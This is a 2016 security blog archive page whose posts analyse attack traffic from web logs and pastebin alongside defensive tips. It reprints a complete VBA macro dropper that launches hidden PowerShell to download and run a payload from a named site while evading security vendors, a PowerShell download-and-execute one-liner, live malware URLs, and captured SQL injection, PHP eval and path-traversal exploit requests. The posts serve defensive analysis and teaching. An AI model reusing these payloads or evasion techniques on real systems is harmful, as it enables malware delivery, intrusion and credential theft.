Wednesday, August 31, 2016

Deobfuscating some more Javascript

Saw this paste with malicious javascript. If ou strip out all the malicious variable creations (_zds, se, _dd) and the eval statement at the end , and replace them all with console.log() statements, you can get a bit of a better picture. Then if you do the same routine again of repacing bad stuff with console.log statemnts you finally get this code

and in it there is a freeky looking variable that ends up containing the urls of interest.

var IGv7=[MMo+XQb1+Gd5 + VSv+Hb+Cl+Tj4+VKq+Pg + DSx+Pa + GYy+MEw1+Rj + Pf+NZa2 + Fb9+Fb+Ke+JPy+Ow9 + ORq+Sv+FOl7 + Cn, MMo+Ly5+YOv7 + AYc8+Sq6+So+Af1+Nu + Zz+ZKb + Zn1+Ik+Vy4+PRi5+Ho4+Gy9, VBg+DFu + ZDn + Cl0+Vw+Jc + Fs+Jp + Tu6+Vg7+OZv8 + UTt+Po+Cj3 + Gq8+EDt+Ag+LDc + Qn+St0+HNu + Sk6, MMo+Ly5+Qc7 + Vc9+Zn4 + ALt+Ui4 + BYt+Cc5+ZZq9 + Vm0+Ci5, Wq6 + Ya+Li5 + LJz3+Vg+Je1 + Yu8+ZPg+DFe5+HDm+Su1+Xz + XGx];

when printed out

console.log(IGv7);

["http://jago-computerservice.homepage.t-online.de/poxs17b", "http://www.elba-scaglieri.com/vj021d23", "http://sven-jaenecke.homepage.t-online.de/zvs7h", "http://www.arrotin.net/y263j", "http://bookinghotworld.ws/0b8acb"]



More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Run this Free Scan on your Website

Mozilla came out with a great free online tool called the Mozilla Observatory which gives you another great way to get a gauge as to how secure your developers and sysadmin are setting up your website. It's a simple A to F grade scale again, and of course like every other tool it's not perfect, but if you have a dynamically generated site that pulls records from a database for example, you really want to consider having your team modify your website code to get the score of an A.



It tells you about many great features, mostly HTTP Header related, that you should be doing on your site but may not be. It has the little informational icon which will give you details about how to resolve your issues also.



It also tells you about your SSL configuration (Qualys SSL LAbs is also a good tool for this)

Overall it's good to get 3rd party perspectives on the security of your site.

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Web Developers Add this to your Script Tags

Troy Hunt wrote a great article on Web Subresource Integrity (SRI). As an example notice this script tag, where you're pulling the jquery library from a CDN so that you don't have to host it yourself, and to gain the browser caching performance benefits since the user probably already has it cached anyways.

<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.3/jquery.min.js" integrity="sha384-I6F5OKECLVtK/BL+8iSLDEHowSAfUo76ZL9+kGAgTRdiByINKJaqTPH/QVNS1VDb" crossorigin="anonymous"></script>

Notice the extra fields in red that you may not normally be used to adding/seeing. If you're a web developer you really want to consider adding these. Why?

The integrity attribute means that when the browser loads jQuery from CloudFlare it's going to calculate the hash of the file (a base64-encoded SHA384 hash in this case per the prefix in the attribute), compare it to the one described on the script tag and then only run it if it checks out. Thus if the CDN has been hacked or somehow your browser is getting a Man-in-the-middled modified version of the file, if the hashes don't match, it won't run it.

The crossorigin attribute is set to anonymous to ensure no creds or identity info is sent with the request (i.e. basic auth or an auth cookie)

Good simple stuff to add and increase the security on your site.

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Prevent SQL Injection in PHP

Good quick read on preventing SQL injection by Kamran Mohsin

1-Input Validation
  e.g. convert integers to integers before using so no nasty sql code can be added.
   $id = intval($_GET['id']);


2-Prepared Statements
  e.g. a better way , it separates sql logic from the data
  $stmt = $dbh->prepare("INSERT INTO REGISTRY (name, value) VALUES (:name, :value)");
  $stmt->bindParam(':name', $name);
  $stmt->bindParam(':value', $value);


3-Least Privileges
e.g. even if your developer screwed up, limit what the bad guy can do. if the website only reads certain tables, only give it read access to those tables.


More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

ipconfig /displaydns

Thought it'd be useful to share how to use the built-in windows ipconfig /displaydns command for forensics or security research. This gives you a list of all dns entries cached locally by your workstation so you can see where you, or your malware you're researching has been trying to call out for.



And of course by combining commands you can quickly narrow down the results such as with findstr



More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

VBA Malware with Security Researcher Detection

I saw this paste titled deobfuscated malware on pastebin a few days ago. Thought it was worth discussing. This is a malicious vba script (which launches powershell) that is going to download and execute a payload on the victims computer.

.DownloadFile('http://silkflowersdecordesign.com/admin/worddata.dat', $f);(New-Object -com WScript.Shell).Exec($f)

What's interesting or a bit different about this payload than others is that the attacker is trying to perform "Security Researcher Detection". Similar to how some malware performs VMWare Detection in order to disable itself if it's being run in a virtual machine, this malware is disabling itself if it's being run from within a security research coproration ip subnet. How? The attacker is actually pulling your geo location from maxmind.com

  xmlHttp.Open "GET", "https://www.maxmind.com/geoip/v2.1/city/me", False




and the attacker has a blacklist

  Blacklist = Array( 'Return
   "FORTINET", _
...
   "TREND MICRO", _
...
   "FIREEYE", _


and if for example it contained the text FIREEYE (a leading security research company)



then the malware would disable itself.

  If BlacklistHit Then Error 102


So security researchers should be aware of code/attacks like this that may purposefully do nothing depending on how or where you run it from.

Edit: Mistakenly typed Powershell instead of VBA in title. It's VBA that calls powershell.

The code

Dim gContinue As Boolean
Public Sub InkPicture1_Painted(ByVal Param1 As Long, ByVal Param2 As IInkRectangle)
  On Error GoTo x_Error
  If gContinue Then Exit Sub
   gContinue = True
   ExecutePayload
  Exit Sub
  x_Error:
End Sub

Public Sub ExecutePayload()
  If RecentFileCountTooLow Then Error 101
  If BlacklistHit Then Error 102
  Set WScriptShell = CreateObject("WScript.Shell")
  WScriptShell.Run "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -command $f=[System.IO.Path]::GetTempFileName();(New-Object System.Net.WebClient).DownloadFile('http://silkflowersdecordesign.com/admin/worddata.dat', $f);(New-Object -com WScript.Shell).Exec($f)", 0
  Exit Sub
End Sub

Public Function RecentFileCountTooLow() As Boolean
  RecentFileCountTooLow = RecentFiles.Count < 3
End Function

Dim City As String
Public Function BlacklistHit() As Boolean
  City = UCase(GetCity)
  For Each Value In Blacklist
   If InStr(City, Value) <> 0 Then GoTo InBlacklist
  Next
  Exit Function
  InBlacklist:
   BlacklistHit = True 'Return
End Function

Public Function Blacklist()
  Blacklist = Array( 'Return
   "FORTINET", _
   "CISCO", _
   "TREND MICRO", _
   "RACKSPACE", _
   "HOSTING", _
   "STRONG TECHNOLOGIES", _
   "DATA CENTER", _
   "IRON PORT", _
   "BLUECOAT", _
   "BLUE COAT", _
   "VMVAULT", _
   "MESSAGELABS", _
   "MICROSOFT", _
   "MIMECAST", _
   "LEASEWEB", _
   "BLACKOAKCOMPUTERS", _
   "ESET, SPOL", _
   "SERVER", _
   "DATACENTER", _
   "BITDEFENDER", _
   "DATACENTRE", _
   "OVH SAS", _
   "NFORCE", _
   "TRENDMICRO", _
   "ANONYMOUS", _
   "CLOUD", _
   "AMAZON", _
   "HISPEED.CH", _
   "HOSTED", _
   "IRONPORT", _
   "PALO ALTO", _
   "PROOFPOINT", _
   "SECURITY", _
   "TRUSTWAVE", _
   "FORCEPOINT", _
   "DEDICATED", _
   "HETZNER", _
   "FIREEYE", _
   "ZSCALER"
  )
End Function

Public Function GetCity() As String
  Set xmlHttp = CreateObject("WinHttp.WinHttpRequest.5.1")
  xmlHttp.Open "GET", "https://www.maxmind.com/geoip/v2.1/city/me", False
  xmlHttp.SetRequestHeader "Referer", "https://www.maxmind.com/en/locate-my-ip-address"
  xmlHttp.SetRequestHeader "User-Agent", "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
  xmlHttp.Send
  If xmlHttp.Status <> 200 Then Error 201
   GetCity = xmlHttp.ResponseText 'Return
End Function


More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

.xyz and .top domain names

It struck me that on many of the SANS ISC diaries [1] and the Malware Traffic Analysis blog posts [1] that many if not the majority of the malware analyzed was reaching out to .xyz or .top domain names. It appears they can go for less than $1/yr which may be a contributing factor to why they're so popular with the bad guys. Head over to tld-list.com and sort by “Cheapest Register.” It may not be correct to block them all, but in the current state of things it seems reasonable to possibly alert on or look at all emails and/or web traffic to these top level domains?

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Malicious Powershell executing downloaded scripts

Interesting Powershell commands. Appears to download a list of Powershell commands, join them together, and execute them.

$web=new-object system.net.webclient;
$web.proxy = [syste.net.webrequest]::defaultwebproxy;
$web.proxy.credentials = [system.net.credentialcache]::defaultnetworkcredentials;
char[]$x=([char[]]($web.downloadstring("http://X.X.X.X/file.asp")));
iex ($x-join)


More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

free @haveibeenpwned notification

Troy Hunt ‏@troyhunt
For those unfamiliar, the free @haveibeenpwned notification service emails you when your email address is in a breach: https://haveibeenpwned.com/NotifyMe



More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Tuesday, August 30, 2016

Work the Flow File Upload Sample Attack

Saw this web request and thought it was interesting enough to mention. It's the Work the Flow File Upload plugin for Wordpress and it appears to be linked to this 2015 File upload exploit.

POST /wp-content/plugins/work-the-flow-file-upload/public/assets/jquery-file-upload-9.5.0/server/php/index.php HTTP/1.1
Host: mysite.com
Content-Length: 270
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0
Connection: keep-alive
Content-Type: multipart/form-data; boundary=18301442f2ce4a0aba32c60e4bf2f5db
action=upload
files=wp-classes.php


Patch your wordpress plugins or get rid of them if you don't use them!

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Monday, August 29, 2016

Are Hackers looking at your Web Backups?

I read a great blog post Mazin Ahmed's Blog on Backup File Artifacts on the web. It's a great article on how Developers, Sysadmin, etc. have to be CAREFUL they aren't leaving backup files/artifacts out on the internet freely accessible to the bad guys. For example ...
a.) Leaving a web.configBACKUP.txt file sitting in the root folder. Suddenly your connection strings are accessible on the internet!!!
b.) Leaving a index.php.bak file out in the web folder. Suddenly your server-side php code could be accessible to the attacker!!!
c.) Leaving a db.mdb.bak out in the web folder. Suddenly a copy of your database is accessible!!!


The bad news is, I've seen developers do this on purpose and accident. It might even get checked into their source control and then auto-deployed out! I've also seen SysAdmins do this too for example when they're doing a website update or perhaps troubleshooting a Production issue. It's CRITICAL that as developers and sysadmins you clean-up/remove your backup file artifacts from production.

The bad guys can use this to grab passwords, data, code, and much more that could allow them to get just enough information to break into your system.

The even worse news? I see bad guys running generic random queries across the entire internet searching for these .bak , .backup, etc. files, so if you have one our there already, they may have already found it and utilized it against you. So take the time to clean your production server now, and remember to put a process in place so those files never get out there again!

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

CIO 5 Practices to make Hackers Life Harder

I liked this CIO Article 5 practices to make hackers lives harder By Thor Olavsrud.

1. Limit admin access to systems
2. Protect privileged account passwords
3. Extend IT security awareness training
4. Limit unknown applications
5. Protect user passwords with security best practices


Simple but effective. For #1 the fewer people that have access, the harder it will be for the attacker to find somebody who has it. For #2 manage and monitor who or what systems get a privileged account, where and how they're used, don't just create them and forget about them. For #3 humans are clearly the weakest link so a lot of time and effort needs to be spent securing them. For #4 make sure you whitelist all applications and application accounts, and don't allow anything else to run. For #5 while most experts think passwords are going the way of the dinosaur soon, for most companies that hasn't happened yet, thus there's no excuse for following best practices on strength, expiration, etc.

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Wordpress Test Environment Requests

Why would somebody make a request to this path?

GET /test/wp-admin/

It appears this is a common, perhaps the default, location to install your "test" environment for a Wordpress blog. The problem appears to be if I do a google search for test wp-admin pages I get a bunch that are indexed and accessible.



I would never advise having your test environment accessible to the internet. Only have it accessible locally, you're just asking for trouble because test environments are never as locked down and monitored as production, and if your test blog is on the same server as production then you've just created a backdoor to production if an attacker can get into your test environment they're on your production server.

Another perhaps even bigger problem is that when I do the google search, most of these folders return directory listing and allow access to potentially sensitive files. Uh-oh. Lock down your test environments or remove them if you don't need them because the bad guys are looking for them!





More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Nagios XI noauth=1 requests

I've seen these admin page requests many times. Interesting that the parameter is noauth=1 which leads me to believe that if somebody misconfigured Nagios XI that it could allow an attacker to bypass authentication.

GET /nagiosxi/login.php?redirect=/nagiosxi/index.php0.000000&noauth=1

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Kazehakase SQL Injection example

This looks like SQL injection attempt of some sort on mysql, saw it this weekend.

GET /index.php/module/aciton/param1/$%7B@print_r(md5(1123123))%7D HTTP/1.1
Host: mysite.com
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6
Connection: keep-alive


The Kazehakase/0.5.6 user-agent stuck out to me as unique.

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Sample PHP Injection Themes.php

Another example of php injection attempt

POST /themes.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)
Host: mysite.com
Content-Length: 178
Content-Type: multipart/form-data; boundary=----------------------------f1fd927d4b1a
qf385ab=eval("echo 10000000000-245205634;");


More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Wordpress Gravity Forms File Upload Attempt

Here is a sample from this weekend of last year's Gravity Forms Wordpress file upload exploit

POST/?gf_page=upload HTTP/1.1
Host: mysite.com
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0
Connection: keep-alive
Content-Length: 2476
Content-Type: multipart/form-data; boundary=3196e7ebf0e84b8499c31b44f2f68dd8
gform_unique_id=../../../../
name=css.php5
form_id=1
field_id=3
file=11.jpg


More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Wordpress Login Wall attack example

Wordpress Login Wall was supposed to be for your protection against brute force and other login attacks. Instead per this older blog post if you use this plugin you may put yourself at risk to attacks that allow for raw eval's of php code that you pass into the login parameter. Ouch.

GET/wp-content/plugins/login-wall-etgfb/login_wall.php?login=cmd

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Magmi Magento Mass Importer PHP Injection

Sample PHP injection attempt on Magento Mass Importer from Friday 8/26

GET/mygarmoemagmi/plugins/plugin.php?uors=eval('echo 10000000000-192853746;');

It would appear the attacker knows about a parameter called uors that may execute raw php so he is displaying (echo) some text and if he sees that text in the http response then he knows the server is vulnerable.

Update: Another Magmi attack below

GET/magmi/web/download_file.php?file=../../app/etc/local.xml

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Friday, August 26, 2016

User-Agent Windows Seven

Hmmm that user agent looks a little suspicious

185.117.73.132 - - [10/Jun/2016:03:33:49 -0400] "GET /Admin/phpMyAdmin/ HTTP/1.1" 404 295 "-" "Mozilla/7.0 (compatible; MSIE 8.0; Windows Seven)"

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Thursday, August 25, 2016

interface/ipsconnect/ipsconnect.php SQL Injection

I saw this web request in the logs and thought it was worth discussing. It appears to be related to an IP.Board 'ipsconnect.php' SQL Injection Vulnerability in the id[] parameter from perhaps 2014/2015 ish. There are public exploits so script kiddies run these kind of queries across the web all the time. The IPS Connect service (interface/ipsconnect/ipsconnect.php) in Invision Power Board (aka IPB or IP.Board) appears impacted.

POST /interface/ipsconnect/ipsconnect.php HTTP/1.1
Host: mywebsite.com
Connection: keep-alive
Accept: */*
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4
Accept-Charset: utf-8;q=0.7,*;q=0.3
Accept-Encoding: gzip,deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 223
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36
act=login
idType=id
id[]=-1
id[]=-1) and 1!="'" and updatexml(NULL,concat(0x3a, ( select table_name from information_schema.tables where BINARY LEFT(table_name, 1) = 'nnn' LIMIT 0,1 ) ),NULL)-- -'



If you look at the request above you see it's sending a payload into the id[] parameter which must not be using parameterized queries and must not be sanitizing the values correctly. It looks like the id should be an integer, but in this case it allows strings, big ugly long strings, strings that contain sql code!

updatexml() is a mysql function that essentially does a xml string replaces. But it's interesting why they would be starting with a NULL string and replacing with a NULL string. Why? This is actually called XPath Error Based Injection. If it's a successful attack ,an error actually gets thrown, and the ERROR message itself contains the data exfiltration. In this case they are trying to grab the name of a particular SQL table to see if they've gained access to the database. If successful it'll probably display something like

Output : XPATH syntax error: ':tableNameHere'

To prevent this, make sure your IP Board software is updated/patched, have a WAF or IPS that blocks SQL Injection attacks, and from a coding perspective use parameterized SQL queries so you can't enter strings in for integers, and sanitize data so special characters like this aren't allowed either.

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Friday, August 19, 2016

TRUFFLEHUNTER Snort Rules

What are they? These links give some background seclist and stack exchange.

That rule is a "truffle," which means it detects a security incident for which we unfortunately cannot provide additional information due to NDA restrictions. TruffleHunter rules are for

vulnerabilities that have been discovered by Talos, disclosed to the vendor, but the vendor has not yet issued a patch.


Example:



More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Thursday, August 18, 2016

Example of Wordpress File Disclosure

I saw this attack in the logs and thought it was interesting enough to mention. It's a known exploit for the WordPress Elegance Theme.

POST /wp-content/themes/elegance/lib/scripts/dl-skin.php HTTP/1.1
Host: mywebsite.mx
Content-Length: 60
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
_mysite_download_skin=../../../../../wp-config.php


It's actually quite simple, there is a PHP page called dl-skin.php that contained a POST parameter called _mysite_download_skin that was not properly sanitized / checking file paths. It is supposed to only allow a user to enter a skin file location in the current skins folder. But since it's not properly checking file path traversal the attacker can actually use the ../ shell command to go up/down folder structures and find files they want. In this case they go up 5 folders to where they believe the wp-config.php file is which is your Wordpress configuration file which probably contains keys, passwords, and all sorts of goodies. This can also be used to access the /etc/passwd file or anything else interesting on a server.

To prevent this of course upgrade your themes and plugins and Wordpress. Ideally you should remove themes and plugins you aren't using. In addition the account that is running Apache is of importance in this. If your account has proper least privilege permissions, this can limit what files the account can actually access for the attacker. But if your Apache web account is root for example or some other higher privileged account then the attacker can gain access to pretty much anywhere on your file system.

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

SQL Injection Example on Five Star Review

I pasted a few interesting web attacks from very recent logs. Thought it'd be interesting to run through some of them.

GET/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\' or mid=@`\'` /*!50000union*//*!50000select*/1,2,3,(select CONCAT(0x7c,userid,0x7c,pwd) from `#@__admin` limit 0,1),5,6,7,8,9#@`\'` &_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294 HTTP/1.1

This first attack looks like it's related to the Five Star Review System , possibly an older well known vulnerability on a company which appears to provide websites with review capabilities. So if you just add their php code to your website, you too can have your customers review your products, provide feedback, rank it with stars, etc. The problem it appears is there must be a SQL injection vulnerability in the _FILES query string parameter. This parameter must not be getting sanitized properly and thus an attacker is able to execute SQL code against the database behind this website. You'll notice in red some values that sorta look like SQL code. Now it looks like in order to get the exploit to work they have to escape characters thus the reason you see @`\'` together to get the correct syntax down to mysql.

' or mid=' /*!50000union*//*!50000select*/1,2,3,
(
select CONCAT(0x7c,userid,0x7c,pwd)
from __admin
limit 0,1
)
,5,6,7,8,9'


Next it's interesting to see the /**/ because that looks like comments, right? They can be ignored, right? WRONG! /*!50000 actually has significance in MySQL. The "50000" refers to a MySQL version, and thus it tells MySQL that only version 5.0.0 and above should run this command.

' /*!50000union*//*!50000select*/1,2,3,
(
select CONCAT(0x7c,userid,0x7c,pwd)
from __admin
limit 0,1
)
,5,6,7,8,9'


Thus there's actually a union and select statement hidden in there !

' union select 1,2,3,
(
select CONCAT(0x7c,userid,0x7c,pwd)
from __admin
limit 0,1
)
,5,6,7,8,9'


Now you can see from here that the attacker has knowledge that the sql query must return 9 column, thus the reason in his union select he's padded it with 8 extra integer value, and only the 4th column is of any interest, so that must be the column that the website displays in html to the browser so that attacker can see his results.

select CONCAT(0x7c,userid,0x7c,pwd)
from __admin
limit 0,1


Thus we're down to just that interesting column. You can see it concatenates 0x7c which per the hex conversion is a pipe (|) with the userid and password. Thus you may see as a result something like '|myusername|mypassword' returned to the screen. Finally notice that it's query the __admin table which must be were the administrator usernames and passwords like for the Five Star Review system and it's only pulling a few records, in this case it says in the limit clause 0,1 which means start at record 0 (the 1st one) and pull 1 record. So it's just returning the top record which likely is the administrator of the Five Start Review system.

GET/admin/_content/_about/aspcms_aboutedit.asp?id=1 and 1=2 union select 1,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35 from aspcms_user where userid=1 HTTP/1.1

This is a very similar attack as the one described in detail above. I'm guessing this is related to the ASP CMS (content management system) just based on the table they are tyring to grab records from (aspcms_user). Notice they are looking for userid=1 which is likely the system administrator record.

Remember to prevent SQL injection use parameterized queries so that data types cannot change and apostrophes cannot be escaped. Also use a sanitization library that escapes/encodes bad characters. Also make sure to do server side validation, if a parameter is supposed to take an ID # ... then only allow integers! If it's supposed to be a file type then make sure it matches a regex even as simple as as .*\..{1,3}.

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Friday, August 12, 2016

adsfoundation.xyz

Was on an iphone in safari when I was redirected to this nasty looking site. I wouldn't recommend clicking :-)

hxxp://adsfoundation.xyz/033/YTozOntzOjEwOiJyZXF1ZXN0X2lkIjtzOjIyOiI1N2FjZjdhYzQ5NDBhODk5MDYzNDQ1IjtzOjEzOiJ0cmFja2luZ19saW5rIjtzOjEwNzoiaHR0cDovL3NlY3VyZS50cmFjazJtb2JpbGUuY29tL2FmZl9jP29mZmVyX2lkPTkwMiZhZmZfaWQ9MTY2JmFmZl9zdWI9NTdhY2Y3YWM0OTQwYTg5OTA2MzQ0NSZhZmZfc3ViMj1VU19UUjciO3M6OToidGltZXN0YW1wIjtpOjE0NzA5NTMzOTg7fQ==#



More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Wordpress File Path Traversal Examples

I pasted several similar Wordpress exploit attempts from some web logs. They generally match WAF or IDS rules of file traversal. They look like this...

GET/wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../../wp-config.php
GET/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php
GET/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10
GET/wp-content/themes/mtheme-unus/css/css.php?files=../../../../wp-config.php


These exploits take advantage of insecure wordpress plugins. Each of them have a query string parameter that would allow you to download a file. Theoretically the plugin was only supposed to allow you to download files from the current plugin directory, like music, audio, etc. that was allowed. But in this case the query string parameter wasn't properly properly the path passed in and it allowed for path traversal (../../) to go up and down the file system hierarchy. In this case the attacker is then attempting to get to the wp-config.php file which can contain your security keys , database user and password, etc. so some valuable data!

To prevent this, either patch your plugins when vulns like this come out ... or disable/remove unused plugins.

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Calculating Seq & Ack Numbers in Packets

I thought it'd be interesting to walk through a Wireshark PCAP packet capture and see if I can explain how certain fields like the Lengths, Sequence, Ack #s, etc. were calculated. It involves a client (10.8.8.101) making a single HTTP GET request to a web server (108.60.15.36) over port 80 and getting an HTTP 200 success response back. Note this PCAP originated from the awesome Malware Traffic Analysis blog and is a real capture from the locky malspam @malware_traffic analyzed.



The first 3 packets above are the initial TCP handshake.

